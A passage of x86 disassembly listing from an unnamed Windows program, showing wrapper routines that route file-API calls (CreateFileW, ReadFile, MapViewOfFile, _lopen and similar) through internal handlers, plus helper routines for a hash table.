loc_50B2F7: ; CODE XREF: sub_50B2B0+27�j
mov eax, [ebp+var_4]
leave
retn 1Ch
sub_50B2B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B2FE proc near ; DATA XREF: _7:00511260�o
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT 0050B3C1 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EAF0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_20], 0
or [ebp+var_1C], 0FFFFFFFFh
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_50B388
push 0
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+var_20]
call sub_500346
test eax, eax
jnz short loc_50B3A6
loc_50B388: ; CODE XREF: sub_50B2FE+70�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116AC ; CreateFileW
mov [ebp+var_1C], eax
loc_50B3A6: ; CODE XREF: sub_50B2FE+88�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50B3B1
jmp short loc_50B3C1
sub_50B2FE endp
; =============== S U B R O U T I N E =======================================
sub_50B3B1 proc near ; CODE XREF: sub_50B2FE+AC�p
; DATA XREF: _6:0050EAF8�o
mov eax, [ebp-20h]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_5083DD
pop ecx
retn
sub_50B3B1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50B2FE
loc_50B3C1: ; CODE XREF: sub_50B2FE+B1�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 1Ch
; END OF FUNCTION CHUNK FOR sub_50B2FE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B3D5 proc near ; CODE XREF: sub_401300+BE�p
; sub_401300+C3�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_500741
test eax, eax
jnz short loc_50B3F5
push [ebp+arg_0]
call ds:dword_5116A4 ; CloseHandle
mov [ebp+var_4], eax
loc_50B3F5: ; CODE XREF: sub_50B3D5+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_50B3D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B3FC proc near ; CODE XREF: sub_40E29B+19B�p
; sub_40E29B+48D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_501177
test eax, eax
jnz short loc_50B436
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_51177C ; ReadFile
mov [ebp+var_4], eax
jmp short loc_50B459
; ---------------------------------------------------------------------------
loc_50B436: ; CODE XREF: sub_50B3FC+1E�j
cmp [ebp+arg_10], 0
jz short loc_50B459
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_50B459
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_50B459
mov eax, [ebp+arg_10]
push dword ptr [eax+10h]
call ds:dword_511784 ; SetEvent
loc_50B459: ; CODE XREF: sub_50B3FC+38�j
; sub_50B3FC+3E�j ...
mov eax, [ebp+var_4]
leave
retn 14h
sub_50B3FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B460 proc near ; CODE XREF: sub_410908+6C�p
; sub_416788+259�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_500421
test eax, eax
jnz short loc_50B491
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511788 ; SetFilePointer
mov [ebp+var_4], eax
jmp short loc_50B49D
; ---------------------------------------------------------------------------
loc_50B491: ; CODE XREF: sub_50B460+18�j
cmp [ebp+arg_8], 0
jz short loc_50B49D
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
loc_50B49D: ; CODE XREF: sub_50B460+2F�j
; sub_50B460+35�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_50B460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B4A4 proc near ; CODE XREF: sub_418CE5+28�p
; _0:0043AB52�j
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_50B4BE
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_500216
test eax, eax
jnz short loc_50B4D9
loc_50B4BE: ; CODE XREF: sub_50B4A4+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116B0 ; CreateFileMappingA
mov [ebp+var_4], eax
loc_50B4D9: ; CODE XREF: sub_50B4A4+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_50B4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B4E0 proc near ; DATA XREF: _7:005112B0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_50B4FA
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_500216
test eax, eax
jnz short loc_50B515
loc_50B4FA: ; CODE XREF: sub_50B4E0+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116B4 ; CreateFileMappingW
mov [ebp+var_4], eax
loc_50B515: ; CODE XREF: sub_50B4E0+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_50B4E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B51C proc near ; CODE XREF: sub_418CE5+39�p
; _0:0043AB4C�j
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4FFFBF
test eax, eax
jnz short loc_50B554
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_51176C ; MapViewOfFile
mov [ebp+var_4], eax
loc_50B554: ; CODE XREF: sub_50B51C+1E�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_50B51C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B55B proc near ; CODE XREF: sub_418CE5+6C�p
; _0:0043AB46�j
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4FFECD
test eax, eax
jnz short loc_50B57B
push [ebp+arg_0]
call ds:dword_5117A0 ; UnmapViewOfFile
mov [ebp+var_4], eax
loc_50B57B: ; CODE XREF: sub_50B55B+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_50B55B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B582 proc near ; DATA XREF: _7:00511328�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_500346
test eax, eax
jz short loc_50B610
cmp [ebp+arg_4], 0
jz short loc_50B60B
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, 88h
jnz short loc_50B60B
mov eax, [ebp+arg_4]
mov byte ptr [eax+1], 1
mov eax, [ebp+arg_4]
and word ptr [eax+2], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
cmp [ebp+var_8], 7Fh
jnb short loc_50B5E0
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
jmp short loc_50B5E7
; ---------------------------------------------------------------------------
loc_50B5E0: ; CODE XREF: sub_50B582+54�j
mov [ebp+var_10], 7Fh
loc_50B5E7: ; CODE XREF: sub_50B582+5C�j
mov ecx, [ebp+var_10]
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
add edi, 8
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_4]
and byte ptr [eax+87h], 0
loc_50B60B: ; CODE XREF: sub_50B582+22�j
; sub_50B582+2F�j
mov eax, [ebp+var_4]
jmp short loc_50B630
; ---------------------------------------------------------------------------
loc_50B610: ; CODE XREF: sub_50B582+1C�j
push offset dword_50E5B4
push offset aOpenfile ; "OpenFile"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
loc_50B630: ; CODE XREF: sub_50B582+8C�j
pop edi
pop esi
leave
retn 0Ch
sub_50B582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B636 proc near ; DATA XREF: _7:00511330�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_500346
test eax, eax
jz short loc_50B656
mov eax, [ebp+var_4]
jmp short locret_50B673
; ---------------------------------------------------------------------------
loc_50B656: ; CODE XREF: sub_50B636+19�j
push offset dword_50E5B4
push offset a_lopen ; "_lopen"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
locret_50B673: ; CODE XREF: sub_50B636+1E�j
leave
retn 8
sub_50B636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B677 proc near ; DATA XREF: _7:00511338�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
movzx eax, ds:byte_5160E4
and eax, 1
test eax, eax
jnz short loc_50B6AB
mov al, ds:byte_5160E4
or al, 1
mov ds:byte_5160E4, al
push offset dword_50E5B4
push offset a_lclose ; "_lclose"
call sub_509C22
pop ecx
pop ecx
mov ds:dword_5160E0, eax
loc_50B6AB: ; CODE XREF: sub_50B677+10�j
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_500741
test eax, eax
jnz short loc_50B6C6
push [ebp+arg_0]
call ds:dword_5160E0
jmp short locret_50B6C8
; ---------------------------------------------------------------------------
loc_50B6C6: ; CODE XREF: sub_50B677+42�j
xor eax, eax
locret_50B6C8: ; CODE XREF: sub_50B677+4D�j
leave
retn 4
sub_50B677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B6CC proc near ; DATA XREF: _7:00511348�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_500421
test eax, eax
jnz short loc_50B70A
push offset dword_50E5B4
push offset a_llseek ; "_llseek"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_50B70A: ; CODE XREF: sub_50B6CC+19�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_50B6CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B711 proc near ; DATA XREF: _7:00511340�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_501177
test eax, eax
jnz short loc_50B763
push offset dword_50E5B4
push offset a_lread ; "_lread"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_50B763
mov [ebp+var_4], 1
loc_50B763: ; CODE XREF: sub_50B711+20�j
; sub_50B711+49�j
cmp [ebp+var_4], 0
jnz short loc_50B76F
or [ebp+var_10], 0FFFFFFFFh
jmp short loc_50B775
; ---------------------------------------------------------------------------
loc_50B76F: ; CODE XREF: sub_50B711+56�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
loc_50B775: ; CODE XREF: sub_50B711+5C�j
mov eax, [ebp+var_10]
leave
retn 0Ch
sub_50B711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B77C proc near ; CODE XREF: sub_502DD0+6C7�p
; sub_502DD0+70D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_8]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_0]
shl eax, 2
push eax
call sub_50835A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_51174C ; InitializeCriticalSection
mov eax, [ebp+var_8]
leave
retn 4
sub_50B77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B7C0 proc near ; CODE XREF: sub_50B82A+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
and [ebp+var_4], 0
jmp short loc_50B7D6
; ---------------------------------------------------------------------------
loc_50B7CF: ; CODE XREF: sub_50B7C0:loc_50B824�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_50B7D6: ; CODE XREF: sub_50B7C0+D�j
mov eax, [ebp+var_14]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short locret_50B826
mov eax, [ebp+var_14]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
loc_50B7EF: ; CODE XREF: sub_50B7C0+62�j
cmp [ebp+var_8], 0
jz short loc_50B824
cmp [ebp+arg_0], 0
jz short loc_50B804
mov eax, [ebp+var_8]
push dword ptr [eax]
call [ebp+arg_0]
pop ecx
loc_50B804: ; CODE XREF: sub_50B7C0+39�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_5083DD
pop ecx
jmp short loc_50B7EF
; ---------------------------------------------------------------------------
loc_50B824: ; CODE XREF: sub_50B7C0+33�j
jmp short loc_50B7CF
; ---------------------------------------------------------------------------
locret_50B826: ; CODE XREF: sub_50B7C0+1E�j
leave
retn 4
sub_50B7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B82A proc near ; CODE XREF: sub_505070+51�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
push 0
mov ecx, [ebp+var_8]
call sub_50B7C0
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_5083DD
pop ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_511750 ; RtlDeleteCriticalSection
leave
retn
sub_50B82A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B85D proc near ; DATA XREF: sub_50B871+C�o
; sub_50B8E0+C�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp eax, [ebp+arg_4]
setnz cl
mov eax, ecx
pop ebp
retn 8
sub_50B85D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B871 proc near ; CODE XREF: sub_4FF036+94�p
; sub_4FF6DE+63�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_50BAFE
push offset sub_50B85D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_50B891
leave
retn 4
sub_50B871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B891 proc near ; CODE XREF: sub_5058CF+20�p
; sub_50B871+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov eax, [ecx+eax*4]
mov [ebp+var_4], eax
loc_50B8B2: ; CODE XREF: sub_50B891+47�j
cmp [ebp+var_4], 0
jz short loc_50B8DA
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_50B8CF
mov eax, [ebp+var_4]
mov eax, [eax]
jmp short locret_50B8DC
; ---------------------------------------------------------------------------
loc_50B8CF: ; CODE XREF: sub_50B891+35�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_50B8B2
; ---------------------------------------------------------------------------
loc_50B8DA: ; CODE XREF: sub_50B891+25�j
xor eax, eax
locret_50B8DC: ; CODE XREF: sub_50B891+3C�j
leave
retn 0Ch
sub_50B891 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B8E0 proc near ; CODE XREF: sub_4FF818+93�p
; sub_4FFD24+106�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_50BAFE
push offset sub_50B85D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_50B900
leave
retn 4
sub_50B8E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B900 proc near ; CODE XREF: sub_505FCD+F1�p
; sub_50B8E0+17�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], ecx
mov eax, [ebp+var_18]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
lea eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_50B937: ; CODE XREF: sub_50B900+86�j
cmp [ebp+var_8], 0
jz short loc_50B988
push [ebp+arg_0]
mov eax, [ebp+var_8]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_50B974
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov [eax], ecx
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
push [ebp+var_14]
call sub_5083DD
pop ecx
mov eax, [ebp+var_10]
jmp short locret_50B98A
; ---------------------------------------------------------------------------
loc_50B974: ; CODE XREF: sub_50B900+4B�j
mov eax, [ebp+var_8]
add eax, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
jmp short loc_50B937
; ---------------------------------------------------------------------------
loc_50B988: ; CODE XREF: sub_50B900+3B�j
xor eax, eax
locret_50B98A: ; CODE XREF: sub_50B900+72�j
leave
retn 0Ch
sub_50B900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B98E proc near ; CODE XREF: sub_4FC000+3E�p
; sub_500216+D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_50BAFE
push offset sub_50B85D
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_50B9B1
leave
retn 8
sub_50B98E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B9B1 proc near ; CODE XREF: sub_505BD7+204�p
; sub_50B98E+1A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push edi
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_C]
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_50B9DA: ; CODE XREF: sub_50B9B1+52�j
cmp [ebp+var_4], 0
jz short loc_50BA05
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_8]
test eax, eax
jnz short loc_50B9FA
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
jmp short loc_50BA62
; ---------------------------------------------------------------------------
loc_50B9FA: ; CODE XREF: sub_50B9B1+3D�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_50B9DA
; ---------------------------------------------------------------------------
loc_50BA05: ; CODE XREF: sub_50B9B1+2D�j
push 0Ch
call sub_50835A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_50BA26
xor eax, eax
mov edi, [ebp+var_C]
stosd
stosd
stosd
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
jmp short loc_50BA2A
; ---------------------------------------------------------------------------
loc_50BA26: ; CODE XREF: sub_50B9B1+63�j
and [ebp+var_14], 0
loc_50BA2A: ; CODE XREF: sub_50B9B1+73�j
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov eax, [eax+edx*4]
mov [ecx+8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov [eax+ecx*4], edx
loc_50BA62: ; CODE XREF: sub_50B9B1+47�j
pop edi
leave
retn 10h
sub_50B9B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BA67 proc near ; CODE XREF: sub_5046D0+6F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax+0Ch], 0
leave
retn
sub_50BA67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BA7E proc near ; CODE XREF: sub_5046D0+82�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
loc_50BA85: ; CODE XREF: sub_50BA7E+5D�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov eax, [eax+4]
cmp eax, [ecx]
jb short loc_50BA96
xor al, al
jmp short locret_50BAFA
; ---------------------------------------------------------------------------
loc_50BA96: ; CODE XREF: sub_50BA7E+12�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_50BAB6
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov edx, [ebp+var_4]
mov eax, [ecx+eax*4]
mov [edx+0Ch], eax
jmp short loc_50BAC5
; ---------------------------------------------------------------------------
loc_50BAB6: ; CODE XREF: sub_50BA7E+1F�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_4]
mov eax, [eax+8]
mov [ecx+0Ch], eax
loc_50BAC5: ; CODE XREF: sub_50BA7E+36�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_50BADD
mov eax, [ebp+var_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+var_4]
mov [ecx+4], eax
jmp short loc_50BA85
; ---------------------------------------------------------------------------
loc_50BADD: ; CODE XREF: sub_50BA7E+4E�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_0]
mov eax, [eax+4]
mov [ecx], eax
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov eax, [eax]
mov [ecx], eax
mov al, 1
locret_50BAFA: ; CODE XREF: sub_50BA7E+16�j
leave
retn 8
sub_50BA7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BAFE proc near ; DATA XREF: sub_50B871+7�o
; sub_50B8E0+7�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
pop ebp
retn
sub_50BAFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BB0D proc near ; DATA XREF: sub_5058CF+C�o
; sub_505BD7+1ED�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_50BB47
jmp short loc_50BB2B
; ---------------------------------------------------------------------------
loc_50BB24: ; CODE XREF: sub_50BB0D+38�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_50BB2B: ; CODE XREF: sub_50BB0D+15�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_50BB47
mov eax, [ebp+var_8]
shl eax, 1
mov ecx, [ebp+var_4]
movzx ecx, byte ptr [ecx]
or eax, ecx
mov [ebp+var_8], eax
jmp short loc_50BB24
